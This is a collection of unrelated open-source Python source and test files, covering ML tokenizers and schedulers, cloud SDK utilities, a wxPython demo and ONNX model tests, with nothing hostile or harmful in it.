cls_token: str = "<s>",
pad_token: str = "<pad>",
eos_token: str = "</s>",
sep_token: str = "</s>",
unk_token: str = "<unk>",
mask_token: str = "<mask>",
max_seq_len: int = 514,
):
super().__init__()
self.bos_token = bos_token
self.eos_token = eos_token
self.pad_token = pad_token
self.unk_token = unk_token
self.mask_token = mask_token
self.cls_token = cls_token
self.sep_token = sep_token
self.max_seq_len = max_seq_len
self.token_transform = transforms.SentencePieceTokenizer(spm_model_path)
if os.path.exists(vocab_path):
self.vocab = torch.load(vocab_path)
else:
self.vocab = load_state_dict_from_url(vocab_path)
self.vocab_transform = transforms.VocabTransform(self.vocab)
self.pad_idx = self.vocab[self.pad_token]
self.bos_idx = self.vocab[self.bos_token]
self.eos_idx = self.vocab[self.eos_token]
def forward(self, input: Any,
add_bos: bool = True,
add_eos: bool = True,
truncate: bool = True) -> Any:
if torch.jit.isinstance(input, str):
tokens = self.vocab_transform(self.token_transform(input))
if truncate:
tokens = functional.truncate(tokens, self.max_seq_len - 2)
if add_bos:
tokens = functional.add_token(tokens, self.bos_idx)
if add_eos:
tokens = functional.add_token(tokens, self.eos_idx, begin=False)
return tokens
elif torch.jit.isinstance(input, List[str]):
tokens = self.vocab_transform(self.token_transform(input))
if truncate:
tokens = functional.truncate(tokens, self.max_seq_len - 2)
if add_bos:
tokens = functional.add_token(tokens, self.bos_idx)
if add_eos:
tokens = functional.add_token(tokens, self.eos_idx, begin=False)
return tokens
else:
raise TypeError("Input type not supported")
def get_xlmr_transform(vocab_path, spm_model_path, **kwargs) -> XLMRobertaModelTransform:
return XLMRobertaModelTransform(vocab_path, spm_model_path, **kwargs)
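# Usage sketch (both paths are placeholders; vocab_path may be a local file or a
# URL, per the constructor above):
#
#   transform = get_xlmr_transform(vocab_path="xlmr.vocab.pt",
#                                  spm_model_path="sentencepiece.bpe.model")
#   ids = transform("Hello world")              # bos + token ids + eos
#   batch = transform(["Hello world", "Hallo Welt"])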
|
Python/WxPython/list.py | Gjacquenot/training-material | 115 | 11089394 | #!/usr/bin/env python
import paramiko
import time
import sys
import wx
import wx.lib.mixins.listctrl as listmix
class AutoWidthListCtrl(wx.ListCtrl, listmix.ListCtrlAutoWidthMixin):
def __init__(self, parent, ID, pos=wx.DefaultPosition, size=wx.DefaultSize, style=0):
wx.ListCtrl.__init__(self, parent, ID, pos, size, style)
listmix.ListCtrlAutoWidthMixin.__init__(self)
class Appl(wx.Frame, listmix.ColumnSorterMixin):
def __init__(self, title='appl.py'):
super(Appl, self).__init__(None, title=title, size=(260, 180))
self.initUI()
self.initTimer()
self.Show(True)
def initUI(self):
self.InitMenubar()
self.sizer = wx.BoxSizer(wx.VERTICAL)
self.total = wx.StaticText(self, -1, "Total:")
self.sizer.Add(self.total, 0, wx.EXPAND)
self.SetSizer(self.sizer)
self.list = AutoWidthListCtrl(self, -1, style=wx.LC_REPORT|wx.LC_SORT_ASCENDING)
self.sizer.AddSpacer(10)
self.sizer.Add(self.list, 0, wx.EXPAND)
self.list.InsertColumn(0, 'User ID', width=100)
self.list.InsertColumn(1, 'Name', width=100)
self.RetrieveData()
self.list.SetColumnWidth(0, wx.LIST_AUTOSIZE)
self.list.SetColumnWidth(1, wx.LIST_AUTOSIZE)
listmix.ColumnSorterMixin.__init__(self, 2)
def OnQuit(self, evt):
self.Close()
def GetListCtrl(self):
return self.list
def InitMenubar(self):
menubar = wx.MenuBar()
self.SetMenuBar(menubar)
fileMenu = wx.Menu()
menubar.Append(fileMenu, '&File')
fileItem = fileMenu.Append(wx.ID_EXIT, 'Quit', 'Quit application')
self.Bind(wx.EVT_MENU, self.OnQuit, fileItem)
def initTimer(self, interval=3000):
self.timer = wx.Timer(self)
self.timer.Start(interval)
self.Bind(wx.EVT_TIMER, self.RetrieveData)
def RetrieveData(self, evt=None):
if evt is not None:
self.list.DeleteAllItems()
print "cleared"
self.itemDataMap = {0:('vsc30140', 'gjb'), 1:('vsc30032', 'other')}
for key, user in self.itemDataMap.items():
idx = self.list.InsertStringItem(sys.maxint, user[0])
self.list.SetStringItem(idx, 1, user[1])
self.list.SetItemData(idx, key)
self.total.SetLabel('Total: {0}'.format(int(len(self.itemDataMap))))
def main():
app = wx.App()
Appl()
app.MainLoop()
if __name__ == '__main__':
main()
|
alipay/aop/api/domain/LogisticsAccountInfo.py | antopen/alipay-sdk-python-all | 213 | 11089416 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class LogisticsAccountInfo(object):
def __init__(self):
self._audit_desc = None
self._logistics_account_id = None
self._logistics_account_status = None
self._pid = None
@property
def audit_desc(self):
return self._audit_desc
@audit_desc.setter
def audit_desc(self, value):
self._audit_desc = value
@property
def logistics_account_id(self):
return self._logistics_account_id
@logistics_account_id.setter
def logistics_account_id(self, value):
self._logistics_account_id = value
@property
def logistics_account_status(self):
return self._logistics_account_status
@logistics_account_status.setter
def logistics_account_status(self, value):
self._logistics_account_status = value
@property
def pid(self):
return self._pid
@pid.setter
def pid(self, value):
self._pid = value
def to_alipay_dict(self):
params = dict()
if self.audit_desc:
if hasattr(self.audit_desc, 'to_alipay_dict'):
params['audit_desc'] = self.audit_desc.to_alipay_dict()
else:
params['audit_desc'] = self.audit_desc
if self.logistics_account_id:
if hasattr(self.logistics_account_id, 'to_alipay_dict'):
params['logistics_account_id'] = self.logistics_account_id.to_alipay_dict()
else:
params['logistics_account_id'] = self.logistics_account_id
if self.logistics_account_status:
if hasattr(self.logistics_account_status, 'to_alipay_dict'):
params['logistics_account_status'] = self.logistics_account_status.to_alipay_dict()
else:
params['logistics_account_status'] = self.logistics_account_status
if self.pid:
if hasattr(self.pid, 'to_alipay_dict'):
params['pid'] = self.pid.to_alipay_dict()
else:
params['pid'] = self.pid
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = LogisticsAccountInfo()
if 'audit_desc' in d:
o.audit_desc = d['audit_desc']
if 'logistics_account_id' in d:
o.logistics_account_id = d['logistics_account_id']
if 'logistics_account_status' in d:
o.logistics_account_status = d['logistics_account_status']
if 'pid' in d:
o.pid = d['pid']
return o
|
vilya/views/watching.py | mubashshirjamal/code | 1,582 | 11089426 | # -*- coding: utf-8 -*-
from vilya.libs.template import st
_q_exports = []
def _q_index(request):
user = request.user
if user:
watched_projects = user.watched_projects
return st('/watching.html', **locals())
return request.redirect("/hub/teams")
|
moto/eks/utils.py | orenmazor/moto | 5,460 | 11089427 | import inspect
import re
from boto3 import Session
from moto.eks.exceptions import InvalidParameterException
def get_partition(region):
valid_matches = [
# (region prefix, aws partition)
("cn-", "aws-cn"),
("us-gov-", "aws-us-gov"),
("us-gov-iso-", "aws-iso"),
("us-gov-iso-b-", "aws-iso-b"),
]
for prefix, partition in valid_matches:
if region.startswith(prefix):
return partition
return "aws"
def method_name(use_parent=False):
"""
Returns the name of the method which called it from the stack in PascalCase.
If `use_parent` is True, returns the parent of the method which called it instead.
For example: False/default will return the name of the method calling it.
In a helper method, use True to return the name of the method which called the helper.
"""
return (
# stack()[0] is this method, stack()[1] is the method which called this one, etc
inspect.stack()[int(use_parent) + 1][0]
.f_code.co_name.replace("_", " ")
.title()
.replace(" ", "")
)
def validate_role_arn(arn):
valid_role_arn_format = re.compile(
"arn:(?P<partition>.+):iam::(?P<account_id>[0-9]{12}):role/.+"
)
match = valid_role_arn_format.match(arn)
valid_partition = match.group("partition") in Session().get_available_partitions()
if not all({arn, match, valid_partition}):
raise InvalidParameterException("Invalid Role Arn: '" + arn + "'")
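# Worked examples for the helpers above (results follow directly from the code):
#
#   get_partition("cn-north-1")   # "aws-cn"
#   get_partition("eu-west-1")    # "aws" (no prefix matches, falls through)
#   validate_role_arn("arn:aws:iam::123456789012:role/eks-role")   # no exception raised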
|
tests/ut/python/parallel/test_comm_not_recompute.py | mindspore-ai/mindspore | 3,200 | 11089506 | # Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import mindspore.nn as nn
import mindspore as ms
from mindspore import Tensor, context, Parameter
from mindspore.common.api import _cell_graph_executor
from mindspore.ops import operations as P
from mindspore.common.initializer import initializer
from mindspore.context import _Context
from ....train_step_wrap import train_step_with_loss_warp
class MatMulCell(nn.Cell):
def __init__(self):
super(MatMulCell, self).__init__()
self.reshape = P.Reshape()
self.matmul0 = P.MatMul()
self.weight = Parameter(initializer("ones", [128, 64], ms.float32), name="weight")
self.relu = P.ReLU().shard(((1, 8),))
def construct(self, x):
x = self.matmul0(x, self.weight)
x = self.reshape(x, (32, 128))
x = self.relu(x)
return x
class DenseMutMulNet(nn.Cell):
def __init__(self):
super(DenseMutMulNet, self).__init__()
self.fc1 = nn.Dense(128, 768, activation='relu')
self.fc2 = nn.Dense(128, 768, activation='relu')
self.fc3 = nn.Dense(128, 768, activation='relu')
self.fc4 = nn.Dense(768, 768, activation='relu')
self.fc1.matmul.shard(((1, 1), (1, 8)))
self.fc2.matmul.shard(((1, 1), (1, 8)))
self.fc3.matmul.shard(((1, 1), (1, 8)))
self.relu4 = nn.ReLU()
self.relu5 = nn.ReLU()
self.transpose = P.Transpose()
self.matmul1 = P.MatMul()
self.matmul2 = P.MatMul()
self.matmul_cell = MatMulCell()
self.fc1.recompute(mp_comm_recompute=False)
self.fc2.recompute(mp_comm_recompute=False)
self.fc3.recompute(mp_comm_recompute=False)
self.matmul_cell.recompute(mp_comm_recompute=False)
def construct(self, x):
x = self.matmul_cell(x)
q = self.fc1(x)
k = self.fc2(x)
v = self.fc3(x)
k = self.transpose(k, (1, 0))
c = self.relu4(self.matmul1(q, k))
s = self.relu5(self.matmul2(c, v))
s = self.fc4(s)
return s
def test_dmnet_train_step():
context.reset_auto_parallel_context()
_Context().set_backend_policy("vm")
context.set_context(mode=context.GRAPH_MODE)
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=8)
input_ = Tensor(np.ones([64, 128]).astype(np.float32) * 0.01)
label = Tensor(np.zeros([32, 768]).astype(np.float32))
net = train_step_with_loss_warp(DenseMutMulNet())
net.set_auto_parallel()
net.set_train()
_cell_graph_executor.compile(net, input_, label)
_Context().set_backend_policy("ge")
|
tests/test_lr_scheduler.py | CanYouImagine/openspeech | 207 | 11089507 | import unittest
import torch
import matplotlib.pyplot as plt
from torch import optim
from openspeech.optim.optimizer import Optimizer
from openspeech.utils import build_dummy_configs
from openspeech.optim.scheduler.warmup_scheduler import (
WarmupLRSchedulerConfigs,
WarmupLRScheduler,
)
from openspeech.optim.scheduler.reduce_lr_on_plateau_scheduler import (
ReduceLROnPlateauScheduler,
ReduceLROnPlateauConfigs,
)
from openspeech.optim.scheduler.transformer_lr_scheduler import (
TransformerLRScheduler,
TransformerLRSchedulerConfigs,
)
from openspeech.optim.scheduler.tri_stage_lr_scheduler import (
TriStageLRScheduler,
TriStageLRSchedulerConfigs,
)
from openspeech.optim.scheduler.warmup_reduce_lr_on_plateau_scheduler import (
WarmupReduceLROnPlateauConfigs,
WarmupReduceLROnPlateauScheduler,
)
class TestLRScheduler(unittest.TestCase):
def test_warmup_lr_scheduler(self):
configs = build_dummy_configs(scheduler_configs=WarmupLRSchedulerConfigs())
lr_histories = list()
total_steps = 15000
model = [torch.nn.Parameter(torch.randn(2, 2, requires_grad=True))]
optimizer = optim.Adam(model, lr=1e-04)
scheduler = WarmupLRScheduler(optimizer, configs)
optimizer = Optimizer(
optim=optimizer,
scheduler=scheduler,
scheduler_period=total_steps,
max_grad_norm=0.0,
)
for timestep in range(total_steps):
optimizer.step(model)
lr_histories.append(optimizer.get_lr())
plt.title('WarmupLRScheduler')
plt.plot(lr_histories, label='lr', color='#FF6C38', linewidth=2)
plt.legend()
plt.grid(True)
plt.xlabel('timestep', fontsize='large')
plt.ylabel('lr', fontsize='large')
plt.savefig('WarmupLRScheduler.png')
def test_reduce_lr_on_plateau_scheduler(self):
configs = build_dummy_configs(scheduler_configs=ReduceLROnPlateauConfigs())
lr_histories = list()
total_steps = 15000
model = [torch.nn.Parameter(torch.randn(2, 2, requires_grad=True))]
optimizer = optim.Adam(model, lr=1e-04)
scheduler = ReduceLROnPlateauScheduler(optimizer, configs)
optimizer = Optimizer(
optim=optimizer,
scheduler=scheduler,
scheduler_period=total_steps,
max_grad_norm=0.0,
)
for timestep in range(total_steps):
optimizer.step(model)
lr_histories.append(optimizer.get_lr())
plt.title('ReduceLROnPlateauScheduler')
plt.plot(lr_histories, label='lr', color='#FF6C38', linewidth=2)
plt.legend()
plt.grid(True)
plt.xlabel('timestep', fontsize='large')
plt.ylabel('lr', fontsize='large')
plt.savefig('ReduceLROnPlateauScheduler.png')
def test_transformer_lr_scheduler(self):
configs = build_dummy_configs(scheduler_configs=TransformerLRSchedulerConfigs())
lr_histories = list()
total_steps = 15000
model = [torch.nn.Parameter(torch.randn(2, 2, requires_grad=True))]
optimizer = optim.Adam(model, lr=1e-04)
scheduler = TransformerLRScheduler(optimizer, configs)
optimizer = Optimizer(
optim=optimizer,
scheduler=scheduler,
scheduler_period=total_steps,
max_grad_norm=0.0,
)
for timestep in range(total_steps):
optimizer.step(model)
lr_histories.append(optimizer.get_lr())
plt.title('TransformerLRScheduler')
plt.plot(lr_histories, label='lr', color='#FF6C38', linewidth=2)
plt.legend()
plt.grid(True)
plt.xlabel('timestep', fontsize='large')
plt.ylabel('lr', fontsize='large')
plt.savefig('TransformerLRScheduler.png')
def test_tri_stage_scheduler(self):
configs = build_dummy_configs(scheduler_configs=TriStageLRSchedulerConfigs())
lr_histories = list()
total_steps = 15000
model = [torch.nn.Parameter(torch.randn(2, 2, requires_grad=True))]
optimizer = optim.Adam(model, lr=1e-04)
scheduler = TriStageLRScheduler(optimizer, configs)
optimizer = Optimizer(
optim=optimizer,
scheduler=scheduler,
scheduler_period=total_steps,
max_grad_norm=0.0,
)
for timestep in range(total_steps):
optimizer.step(model)
lr_histories.append(optimizer.get_lr())
plt.title('TriStageLRScheduler')
plt.plot(lr_histories, label='lr', color='#FF6C38', linewidth=2)
plt.legend()
plt.grid(True)
plt.xlabel('timestep', fontsize='large')
plt.ylabel('lr', fontsize='large')
plt.savefig('TriStageLRScheduler.png')
def test_warmup_reduce_lr_on_plateau_scheduler(self):
configs = build_dummy_configs(scheduler_configs=WarmupReduceLROnPlateauConfigs())
lr_histories = list()
total_steps = 15000
model = [torch.nn.Parameter(torch.randn(2, 2, requires_grad=True))]
optimizer = optim.Adam(model, lr=1e-04)
scheduler = WarmupReduceLROnPlateauScheduler(optimizer, configs)
optimizer = Optimizer(
optim=optimizer,
scheduler=scheduler,
scheduler_period=total_steps,
max_grad_norm=0.0,
)
for timestep in range(total_steps):
optimizer.step(model)
lr_histories.append(optimizer.get_lr())
plt.title('WarmupReduceLROnPlateauScheduler')
plt.plot(lr_histories, label='lr', color='#FF6C38', linewidth=2)
plt.legend()
plt.grid(True)
plt.xlabel('timestep', fontsize='large')
plt.ylabel('lr', fontsize='large')
plt.savefig('WarmupReduceLROnPlateauScheduler.png')
if __name__ == '__main__':
unittest.main()
|
tests/decoration_tests.py | dvzrv/softlayer-python | 126 | 11089509 | """
SoftLayer.tests.decoration_tests
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:license: MIT, see LICENSE for more details.
"""
import logging
from unittest import mock as mock
from SoftLayer.decoration import retry
from SoftLayer import exceptions
from SoftLayer import testing
class TestDecoration(testing.TestCase):
def setUp(self):
super(TestDecoration, self).setUp()
self.patcher = mock.patch('SoftLayer.decoration.sleep')
self.patcher.return_value = False
self.patcher.start()
self.addCleanup(self.patcher.stop)
self.counter = 0
def test_no_retry_required(self):
@retry(exceptions.SoftLayerError, tries=4)
def succeeds():
self.counter += 1
return 'success'
r = succeeds()
self.assertEqual(r, 'success')
self.assertEqual(self.counter, 1)
@mock.patch('SoftLayer.decoration.randint')
def test_retries_once(self, _random):
_random.side_effect = [0, 0, 0, 0]
@retry(exceptions.SoftLayerError, tries=4, logger=logging.getLogger(__name__))
def fails_once():
self.counter += 1
if self.counter < 2:
raise exceptions.SoftLayerError('failed')
else:
return 'success'
with self.assertLogs(__name__, level='WARNING') as log:
r = fails_once()
self.assertEqual(log.output, ["WARNING:tests.decoration_tests:failed, Retrying in 5 seconds..."])
self.assertEqual(r, 'success')
self.assertEqual(self.counter, 2)
def test_limit_is_reached(self):
@retry(exceptions.SoftLayerError, tries=4)
def always_fails():
self.counter += 1
raise exceptions.SoftLayerError('failed!')
self.assertRaises(exceptions.SoftLayerError, always_fails)
self.assertEqual(self.counter, 4)
def test_multiple_exception_types(self):
@retry((exceptions.SoftLayerError, TypeError), tries=4)
def raise_multiple_exceptions():
self.counter += 1
if self.counter == 1:
raise exceptions.SoftLayerError('a retryable error')
elif self.counter == 2:
raise TypeError('another retryable error')
else:
return 'success'
r = raise_multiple_exceptions()
self.assertEqual(r, 'success')
self.assertEqual(self.counter, 3)
def test_unexpected_exception_does_not_retry(self):
@retry(exceptions.SoftLayerError, tries=4)
def raise_unexpected_error():
raise TypeError('unexpected error')
self.assertRaises(TypeError, raise_unexpected_error)
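# Illustrative application-side use of the decorator exercised above (only the
# arguments these tests demonstrate, the exception type(s), `tries` and `logger`,
# are assumed; the SoftLayer call is a plausible placeholder):
#
#   from SoftLayer.decoration import retry
#   from SoftLayer import exceptions
#
#   @retry(exceptions.SoftLayerError, tries=3)
#   def fetch_account(client):
#       return client.call('Account', 'getObject')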
|
IronManFly/storage/db/utils.py | leepand/IronManFly | 599 | 11089524 | import os
import json
import base64
def profile_path(profile_id, profile):
"""Create full path to given provide for the current user."""
user = os.path.expanduser("~")
return os.path.join(user, profile_id + profile)
def load_profile(f):
return json.loads(base64.decodestring(open(f, 'rb').read()).decode('utf-8'))
def load_from_json(file_path):
"""Load the stored data from json, and return as a dict."""
if os.path.exists(file_path):
raw_data = open(file_path, 'rb').read()
return json.loads(base64.decodestring(raw_data).decode('utf-8'))
def dump_to_json(file_path, data):
with open(file_path, 'wb') as f:
json_data = json.dumps(data)
try:
f.write(base64.encodestring(json_data))
except:
f.write(base64.encodestring(bytes(json_data, 'utf-8')))
|
google/cloud/forseti/common/gcp_type/instance_group_manager.py | aarontp/forseti-security | 921 | 11089526 | # Copyright 2017 The Forseti Security Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A Compute InstanceGroupManager.
See:
https://cloud.google.com/compute/docs/reference/latest/instanceGroupManagers
"""
from builtins import object
import json
# pylint: disable=too-many-instance-attributes
class InstanceGroupManager(object):
"""Represents InstanceGroupManager resource."""
def __init__(self, **kwargs):
"""InstanceGroupManager resource.
Args:
**kwargs (dict): Keyworded variable args.
"""
self.id = kwargs.get('id')
self.base_instance_name = kwargs.get('base_instance_name')
self.creation_timestamp = kwargs.get('creation_timestamp')
self.description = kwargs.get('description')
self.current_actions = kwargs.get('current_actions')
self.instance_group = kwargs.get('instance_group')
self.instance_template = kwargs.get('instance_template')
self.name = kwargs.get('name')
self.named_ports = kwargs.get('named_ports')
self.project_id = kwargs.get('project_id')
self.region = kwargs.get('region')
self.resource_id = kwargs.get('id')
self.target_pools = kwargs.get('target_pools')
self.target_size = kwargs.get('target_size')
self.zone = kwargs.get('zone')
self._json = kwargs.get('raw_instance_group_manager')
@classmethod
def from_dict(cls, igm, project_id=None):
"""Creates an InstanceGroupManager from an instance group manager dict.
Args:
igm (dict): An instance group manager resource dict.
project_id (str): A project id for the resource.
Returns:
InstanceGroupManager: A new InstanceGroupManager object.
"""
kwargs = {'project_id': project_id,
'id': igm.get('id'),
'creation_timestamp': igm.get('creationTimestamp'),
'name': igm.get('name'),
'description': igm.get('description'),
'base_instance_name': igm.get('baseInstanceName'),
'current_actions': igm.get('currentActions', {}),
'instance_group': igm.get('instanceGroup'),
'instance_template': igm.get('instanceTemplate'),
'named_ports': igm.get('namedPorts', []),
'region': igm.get('region'),
'target_pools': igm.get('targetPools', []),
'target_size': igm.get('targetSize'),
'zone': igm.get('zone'),
'raw_instance_group_manager': json.dumps(
igm, sort_keys=True)}
return cls(**kwargs)
@staticmethod
def from_json(json_string, project_id=None):
"""Creates an InstanceGroupManager from a JSON string.
Args:
json_string (str): A json string representing the instance group
manager.
project_id (str): A project id for the resource.
Returns:
InstanceGroupManager: A new InstanceGroupManager object.
"""
igm = json.loads(json_string)
return InstanceGroupManager.from_dict(igm, project_id)
def _create_json_str(self):
"""Creates a json string based on the object attributes.
Returns:
str: json str.
"""
resource_dict = {
'id': self.id,
'creationTimestamp': self.creation_timestamp,
'name': self.name,
'description': self.description,
'baseInstanceName': self.base_instance_name,
'currentActions': self.current_actions,
'instanceGroup': self.instance_group,
'instanceTemplate': self.instance_template,
'namedPorts': self.named_ports,
'targetPools': self.target_pools,
'targetSize': self.target_size,
'zone': self.zone}
# Strip out empty values
resource_dict = dict((k, v) for k, v in
list(resource_dict.items()) if v)
return json.dumps(resource_dict, sort_keys=True)
@property
def json(self):
"""Returns the json string representation of the resource.
Returns:
str: json str.
"""
if not self._json:
self._json = self._create_json_str()
return self._json
# TODO: Create utility methods to reconstruct full region, target, and
# self link.
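# Round-trip sketch (minimal dict; omitted fields simply come back empty/None):
#
#   igm = InstanceGroupManager.from_dict(
#       {'id': '123', 'name': 'my-igm', 'targetSize': 3}, project_id='my-project')
#   igm.json   # JSON string rebuilt from the populated attributes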
|
office365/sharepoint/changes/change_field.py | wreiner/Office365-REST-Python-Client | 544 | 11089529 | from office365.sharepoint.changes.change import Change
class ChangeField(Change):
@property
def field_id(self):
return self.properties.get("FieldId", None)
|
bindings/python/cntk/tests/onnx_model_test.py | rohankumardubey/CNTK | 17,702 | 11089530 | # Copyright (c) Microsoft. All rights reserved.
# Licensed under the MIT license. See LICENSE.md file in the project root
# for full license information.
# ==============================================================================
import cntk as C
import numpy as np
import pytest
import os
import re
import shutil
import time
import tempfile
onnx = pytest.importorskip("onnx")
from onnx import numpy_helper
from .onnx_verify_helper import generate_sequence_data, generate_sequential_data, generate_sparse_data, verify_results_with_onnxruntime, generate_sparse_data_non_seq
from .onnx_test_helper import find_onnx_value_info_proto_with_matching_name, save_cntk_data_as_onnx_tensor, save_test_data, save_onnx_model_with_validation_data
from .onnx_op_test import verify_sequence_model
# To test models locally, create folder 'onnx_models' and put in model folders.
# For example.
# .
# +-- onnx_models # models stored in 'model.onnx' onnx format.
# | +-- model1
# | | +-- model.onnx
# | | +-- test_data_set_0
# | | | +-- input_0.pb
# | | | +-- input_1.pb
# | | | +-- output_0.pb
# | | +-- test_data_set_1
# | | | +-- input_0.pb
# | | | +-- input_1.pb
# | | | +-- output_0.pb
# | +-- model2
# ...
# +-- PretrainedModelsV2 # models stored in '.model' CNTKv2 format.
# | +-- model1.model
# | +-- model2.model
# ...
def get_base_dir(base_dir):
return base_dir if not 'CNTK_EXTERNAL_TESTDATA_SOURCE_DIRECTORY' in os.environ else os.path.join(os.environ['CNTK_EXTERNAL_TESTDATA_SOURCE_DIRECTORY'], base_dir)
onnx_base_dir = get_base_dir('onnx_models')
onnx_model_names = [dir for dir in os.listdir(onnx_base_dir)
if os.path.isdir(os.path.join(onnx_base_dir, dir)) and os.path.exists(os.path.join(onnx_base_dir, dir, 'model.onnx'))] if os.path.exists(onnx_base_dir) else []
cntk_base_dir = get_base_dir('PretrainedModelsV2')
cntk_model_names = [dir for dir in os.listdir(cntk_base_dir)
if os.path.isfile(os.path.join(cntk_base_dir, dir)) and dir.rfind('.model') + len('.model') == len(dir)] if os.path.exists(cntk_base_dir) else []
input_filename_pattern = re.compile('input_[0-9]+.pb')
output_filename_pattern = re.compile('output_[0-9]+.pb')
skip_model_names = [
# Convolution Nan issue on Linux.
'shufflenet',
# Tests from onnx backend tests that currently fails.
'test_constant',
'test_edge_pad',
'test_gru_defaults',
'test_gru_seq_length',
'test_gru_with_initial_bias',
'test_lstm_defaults',
'test_lstm_with_initial_bias',
'test_lstm_with_peepholes',
'test_reduce_log_sum',
'test_reduce_log_sum_asc_axes',
'test_reduce_log_sum_default',
'test_reduce_log_sum_desc_axes',
'test_reshape_extended_dims',
'test_reshape_negative_dim',
'test_reshape_one_dim',
'test_reshape_reduced_dims',
'test_reshape_reordered_dims',
'test_rnn_seq_length',
'test_shape',
'test_shape_example',
'test_simple_rnn_defaults',
'test_simple_rnn_with_initial_bias',
'test_size',
'test_size_example',
'test_slice_end_out_of_bounds',
'test_slice_start_out_of_bounds',
'test_split_equal_parts_1d',
'test_split_equal_parts_2d',
'test_split_equal_parts_default_axis',
'test_split_variable_parts_1d',
'test_split_variable_parts_2d',
'test_split_variable_parts_default_axis',
'test_sum_one_input',
'test_thresholdedrelu',
'test_thresholdedrelu_default',
'test_thresholdedrelu_example',
'test_tile',
'test_tile_precomputed',
'test_top_k',
'test_transpose_default',
'test_upsample_nearest',
]
skip_round_trip_model_names = [
# Convolution Nan issue on Linux.
'shufflenet',
# Tests from onnx backend tests that currently fails.
'test_constant',
'test_edge_pad',
'test_gru_defaults',
'test_gru_seq_length',
'test_gru_with_initial_bias',
'test_lstm_defaults',
'test_lstm_with_initial_bias',
'test_lstm_with_peepholes',
'test_reduce_log_sum',
'test_reduce_log_sum_asc_axes',
'test_reduce_log_sum_default',
'test_reduce_log_sum_desc_axes',
'test_reshape_extended_dims',
'test_reshape_negative_dim',
'test_reshape_one_dim',
'test_reshape_reduced_dims',
'test_reshape_reordered_dims',
'test_rnn_seq_length',
'test_shape',
'test_shape_example',
'test_simple_rnn_defaults',
'test_simple_rnn_with_initial_bias',
'test_size',
'test_size_example',
'test_slice',
'test_slice_default_axes',
'test_slice_end_out_of_bounds',
'test_slice_start_out_of_bounds',
'test_split_equal_parts_1d',
'test_split_equal_parts_2d',
'test_split_equal_parts_default_axis',
'test_split_variable_parts_1d',
'test_split_variable_parts_2d',
'test_split_variable_parts_default_axis',
'test_sum_one_input',
'test_thresholdedrelu',
'test_thresholdedrelu_default',
'test_thresholdedrelu_example',
'test_tile',
'test_tile_precomputed',
'test_top_k',
'test_transpose_default',
'test_upsample_nearest',
# Lack proper support for ONNX ConvTranspose output_padding attribute.
'test_convtranspose_kernel_shape',
'test_convtranspose_output_shape',
'test_convtranspose_pad',
'test_convtranspose_with_kernel',
]
skip_cntk_model_names = []
@pytest.mark.parametrize('model_name, round_trip',
[(model_name, round_trip) for model_name in onnx_model_names for round_trip in [False, True]],
ids=['round_trip_' + model_name if round_trip else model_name for model_name in onnx_model_names for round_trip in [False, True]])
def test_onnx_model(model_name, round_trip):
if model_name in skip_model_names and not round_trip:
pytest.skip('Skip onnx model test. ')
if model_name in skip_round_trip_model_names and round_trip:
pytest.skip('Skip onnx model round trip test. ')
model_dir = os.path.join(onnx_base_dir, model_name)
model = C.Function.load(os.path.join(model_dir, 'model.onnx'), format=C.ModelFormat.ONNX)
if round_trip:
resave_model_path = 'model_resave.onnx'
model.save(resave_model_path, format=C.ModelFormat.ONNX)
model = C.Function.load(resave_model_path, format=C.ModelFormat.ONNX)
data_dirs = [os.path.join(model_dir, dir) for dir in os.listdir(model_dir)
if os.path.isdir(os.path.join(model_dir, dir))]
for data_dir in data_dirs:
inputs = []
ref_outputs = []
tensor = onnx.TensorProto()
input_filenames = [filename for filename in os.listdir(data_dir) if input_filename_pattern.match(filename)]
input_files_sorted = [os.path.join(data_dir, 'input_{:d}.pb'.format(i))
for i in range(len(input_filenames))]
output_filenames = [filename for filename in os.listdir(data_dir) if output_filename_pattern.match(filename)]
output_files_sorted = [os.path.join(data_dir, 'output_{:d}.pb'.format(i))
for i in range(len(output_filenames))]
for input_file in input_files_sorted:
with open(input_file, 'rb') as f:
tensor.ParseFromString(f.read())
inputs.append(numpy_helper.to_array(tensor))
for output_file in output_files_sorted:
with open(output_file, 'rb') as f:
tensor.ParseFromString(f.read())
ref_outputs.append(numpy_helper.to_array(tensor))
cntk_input = {model.arguments[i]:inputs[i] for i in range(len(inputs))}
cntk_res = [model.eval(cntk_input)]
if ref_outputs[0].dtype == np.bool:
cntk_res = [cntk_res[0].astype("bool")]
outputs = list(cntk_res)
np.testing.assert_equal(len(ref_outputs), len(outputs))
for i in range(len(outputs)):
np.testing.assert_equal(ref_outputs[i].dtype, outputs[i].dtype)
np.testing.assert_allclose(
ref_outputs[i],
outputs[i],
rtol=1e-3,
atol=1e-4)
# Helper for exporting test data.
model_file = 'model.onnx'
data_dir = 'test_data_set_0'
def SaveData(test_data_dir, prefix, onnx_variables, variables, data_list, names, batch_size=1):
if isinstance(data_list, np.ndarray):
data_list = [data_list]
for (i, d), v, n in zip(enumerate(data_list), variables, names):
onnx_value_info_proto = find_onnx_value_info_proto_with_matching_name(onnx_variables, n, onnx_variables[0])
save_cntk_data_as_onnx_tensor(os.path.join(test_data_dir, '{0}_{1}.pb'.format(prefix, i)), v, d, onnx_value_info_proto)
def Save(dir, func, inputs, outputs, batch_size=1, use_external_files_to_store_parameters = False):
if not os.path.exists(dir):
os.makedirs(dir)
model_file_path = os.path.join(dir, model_file)
func.save(model_file_path, C.ModelFormat.ONNX, use_external_files_to_store_parameters = use_external_files_to_store_parameters)
onnx_model = onnx.load(model_file_path)
